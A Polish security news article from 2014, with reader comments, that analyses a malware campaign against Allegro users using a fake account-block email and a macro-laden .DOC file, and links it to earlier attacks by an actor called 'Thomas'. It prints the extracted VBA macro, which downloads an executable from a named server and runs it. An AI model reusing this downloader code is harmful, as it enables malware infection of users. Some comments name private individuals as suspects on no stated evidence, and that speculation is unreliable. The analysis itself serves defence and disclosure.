20.06.2014 | 13:34

Adam Haertle

Tajemniczy „Thomas”, czyli kto regularnie atakuje polskich internautów

Wśród licznych internetowych ataków, których ofiarami padają Polacy, od czasu do czasu widać takie, których sprawcami są nasi rodacy. Analiza kilku z nich pozwala stwierdzić, że ich autorem może być jedna i ta sama osoba, ukrywająca się pod pseudonimem Thomas.

Dwa dni temu wielu użytkowników Allegro otrzymało całkiem dobrze przygotowaną wiadomość, której celem było nakłonienie ich do zainstalowania na swoich komputerach złośliwego oprogramowania. Pewne cechy tego ataku wskazują, że sprawca może mieć coś wspólnego z licznymi wcześniejszymi próbami infekowania Polaków.

Atak na użytkowników Allegro

Od środowego popołudnia (czyli tuż przed długim weekendem) osoby posiadające konta na Allegro zaczęły otrzymywać wiadomości o tytule „Blokada Twojego konta Allegro”. Atak, z pozoru przypominający banalny phishing, z phishingiem nie miał nic wspólnego i raczej nie był banalny.

Treść wiadomości wyglądała tak:

Drogi Użytkowniku!

Twoje konto allegro zostanie wkrótce zablokowane z powodu umieszczania w opisie Twojej aukcji „[tutaj nazwa prawdziwej aukcji użytkownika]”
tresci niezgodnych z regulaminem Allegro.
Szczególy na temat bledów w aukcji oraz blokady Twojego konta znajdziesz w dokumencie tekstowym Allegro-05-2014-52556.doc
Przeslanym w zalaczniku wiadomosci.

Z Powazaniem Mariusz Lichowicz
Dzial Intendentury i Monitoringu Allegro

W treści wiadomości zamieszczono nazwę faktycznie wystawionej przez danego użytkownika aukcji, a w załączniku znajdował się plik z rozszerzeniem .DOC.

Czy my skądś znamy tę metodę infekcji?

W pliku DOC nie wykorzystano żadnego błędu typu 0day, a zwykły atak socjotechniczny wsparty odrobiną technologii. Jego otwarcie powoduje wyświetlenie takiego oto „dokumentu”.

Wygląd dokumentu

Wygląd dokumentu

Widoczny na ekranie ślad po nie załadowanym pliku graficznym jest tak naprawdę grafiką o takim właśnie wyglądzie, mającą zachęcić użytkownika do aktywowania obsługi makr. W dalszej analizie przychodzi nam z pomocą niezawodny OfficeMalScanner. Pozwala on zapoznać się z treścią załączonego do pliku .DOC makro bez potrzeby jego uruchamiania. Jego najistotniejszy fragment to:

Sub Workbook_Open()
 Auto_Open
End Sub
Sub MIGYYT()
 MXKAJR "http://serwer1400183.home.pl/MSUPDATE64.exe", Environ("TMP") & "\INPZIX.exe"
End Sub
Function MXKAJR(ByVal JBLVDE As String, ByVal ZLKHGM As String) As Boolean
 Dim NMJVEL As Object, PIRGNC As Long, CWCFQJ As Long, JAVFVS() As Byte
Set NMJVEL = CreateObject("MSXML2.XMLHTTP")
 NMJVEL.Open "GET", JBLVDE, False
 NMJVEL.Send "send request"
Do While NMJVEL.readyState <> 4
 DoEvents
 Loop
JAVFVS = NMJVEL.responseBody
CWCFQJ = FreeFile
 If Dir(ZLKHGM) <> "" Then Kill ZLKHGM
 Open ZLKHGM For Binary As #CWCFQJ
 Put #CWCFQJ, , JAVFVS
 Close #CWCFQJ

 Dim WQFBZN
 WQFBZN = Shell(ZLKHGM, 1)

Regularni czytelnicy naszego serwisu bez trudu zauważą, że kod ten jest praktycznie identyczny z tym, który opisywaliśmy półtora miesiąca temu w analizie ataku na naszych czytelników. Zgadza się praktycznie każda linijka oprócz losowych nazw zmiennych i linku do pliku wykonywalnego, który makro pobiera i uruchamia. Identycznie, jak w poprzednim przypadku, plik DOC stworzony został przez użytkownika Thomas. Co ciekawe, podobny rodzaj ataku występuje relatywnie rzadko, a jeden z udokumentowanych przypadków pochodzi z kwietnia tego roku i dotyczył użytkowników w Holandii.

Krótka analiza pliku wykonywalnego

Plik, który – mimo iż minęły już ponad 2 dni – ciągle znajduje się na serwerach home.pl, również wygląda nam znajomo. Jego analiza wskazuje, że jest wynikiem kompilacji skryptów AutoIt, tak samo jak w ataku na czytelników z3s oraz… w ataku na pracowników polskich samorządów z marca tego roku. Co ciekawe, wg analizy serwisu malwr.com, plik ten pobiera inne złośliwe oprogramowanie z innego serwera, a także zgłasza się do swojego C&C, który również jest serwerem w infrastrukturze home.pl (i także nadal działa). Łączy się także z serwerem w infrastrukturze cba.pl, ta strona została już jednak wyłączona.

Atak identyczny jak w przypadku KRD

Praktycznie taki sam atak, jak na użytkowników Allegro, 3 tygodnie temu wykorzystywał tożsamość Krajowego Rejestru Długów. Jedyna różnica – oprócz treści wiadomości – polegała na tym, że „raport” z KRD nie był dołączony do wiadomości, a w treści był link do jego pobrania z adresu www.krd-raport.pl.tf.

Wiadomość w pliku DOC wyglądała znajomo.

Treść dokumentu DOC

Treść dokumentu DOC

Złośliwe pliki pobierane były z serwera s1.directxex.com, a C&C botnetu (prawdopodobnie Andromedy) znajdowało się w infrastrukturze Home.pl (serwer1455415.home.pl).

To nie koniec analogii

Jak już wspominaliśmy, dokumenty .DOC są bardzo podobne i oba zostały utworzone przez użytkownika Thomas. Co ciekawe, taką samą nazwę użytkownika wskazuje CERT Polska, opisując swoje ustalenia dotyczące autora oprogramowania VBKlip w wersji .NET, którego metodą ataku było podmienianie numeru rachunku bankowego w momencie kopiowania do schowka. Ze sposobem działania tamtego przestępcy zgadza się także podmienianie ikon w plikach wykonywalnych – ten pobierany w ataku na użytkowników Allegro ma również zmienioną ikonę.

Jakby tego było mało, to w treści wiadomości przestępcy pojawił się inny charakterystyczny ciąg, mianowicie „Dzial Intendentury i Monitoringu”, który pierwszy raz trafił do szerszej publiki jeszcze w październiku 2012 roku i kojarzony był z analogicznymi atakami prowadzonymi przez niejakiego Armaged0na, w tym np. phishingu na klientów iPKO.

Czy Armaged0n i Thomas to jedna i ta sama osoba? Czy stoi za wszystkimi opisanymi powyżej atakami, czy też nowi atakujący sprytnie nawiązują do sposobu działania swoich poprzedników, by pomieszać szyki osobom śledzącym ich zachowanie? Naszym zdaniem co najmniej część z opisanych powyżej kampanii ma jednego autora – i zapewne nie raz jeszcze o nim coś napiszemy. Jeśli czyta nasz artykuł  i natrafił na jakieś nieścisłości – zapraszamy do kontaktu.

Za kopię wiadomości z ataku na użytkowników Allegro dziękujemy Maćkowi.

Powrót

Komentarze

  • 2014.06.20 14:03 Thomas

    Ciekawe kiedy odpowiednie osoby się nim zajmą ;-)

    Odpowiedz
  • 2014.06.20 14:22 adi

    Obstawiam ze to Zdzislaw Dyrma ktorego blog niedawno zniknął z sieci :)

    Odpowiedz
    • 2014.06.20 16:11 Marcin

      Tez tak w pierwszej chwili pomyślałem ale dyrma to „programista” php co najwyżej.

      Odpowiedz
    • 2014.06.20 16:13 Mormon

      Niestety, Zdzisiu już od kilku dni jest unieszkodliwiony. :)

      Odpowiedz
    • 2014.06.20 19:02 Archi3

      A wiecie kto przejal strone zdziska i kto sie z nim utozsamia…. JK Mikke

      Odpowiedz
  • 2014.06.20 20:34 Dominik

    Pliki .doc są niewinne. To najwyraźniej program służący do odczytu tych plików jest wirusem, bo pozwala na wykonywanie plików pobranych z internetu bez najmniejszego ostrzeżenia!

    Odpowiedz
    • 2014.06.21 10:00 gron

      Makra są domyślnie wyłączone i ich włączenie powoduje wyświetlenie ostrzeżenia. Masz jakieś problemy natury religijnej z MS? ;)

      Odpowiedz
    • 2014.06.21 18:56 marsjaninzmarsa

      Wyświetla bardzo wyraźne ostrzeżenie i pińcet razy pyta się użytkownika czy wie, co robi. Ale przecież w treści pliku jest napisane, żeby włączyć obsługę makr, więc jak trzeba to trzeba…

      Odpowiedz
  • 2014.06.21 11:55 _0x00

    Publicznie dostępne raty szyfrowane razorcryptem spreadowane via publicznie dostępne makra rce offica to może być ten armagedon.

    Jak widać tyle czasu minęło od poprzednich ataków a on jak był lamerem tak jest nadal…

    Odpowiedz
  • 2014.06.22 02:42 ktostam

    18 czerwca była jeszcze „kampania” rachunków za hotel („Przypominamy o zaleglej Platnosci za Hotel”) rzekomo z [email protected] ([email protected] z acc153.rev.netart.pl) – plik na tym samym serwerze home.pl („gratulacje” dla śniętych adminów home.pl – po raz kolejny brak jakiejkolwiek reakcji na zgłoszenia), ten sam plik i oczywiście ta sama metoda.

    Zwróciłbym również uwagę na niedawną „kampanię” faktur z Niemiec – o ile pamiętam któryś z maili/załączników chyba również odwoływał się do polskich serwerów?

    Odpowiedz
  • 2014.07.07 07:36 H4Sh3d

    Jak słysze teksty to pewnie dyrma to smiać mi się chce nie znacie kolesie gadacie głupoty, czy wy sadzicie ze dyrma to jedyny pr0 w polskich internetach bo jak tak to widocznie macie 13 lat lub w glowie kopa bzdur. Ludzie ogarnicie zwoje bo się pala szybciej niż wam się to wydaje.

    Odpowiedz
  • 2014.07.11 15:37 arr

    Podeślecie próbkę MSUPDATE64.exe?
    P.S. Ten plik który jest pobierany z hostingu directxex (ISR400.exe) to zwykły stealer który przesyła zapisane hasła na zeus-bot.cba.pl

    Odpowiedz

Zostaw odpowiedź do marsjaninzmarsa

Jeśli chcesz zwrócić uwagę na literówkę lub inny błąd techniczny, zapraszamy do formularza kontaktowego. Reagujemy równie szybko.

Tajemniczy „Thomas”, czyli kto regularnie atakuje polskich internautów

Komentarze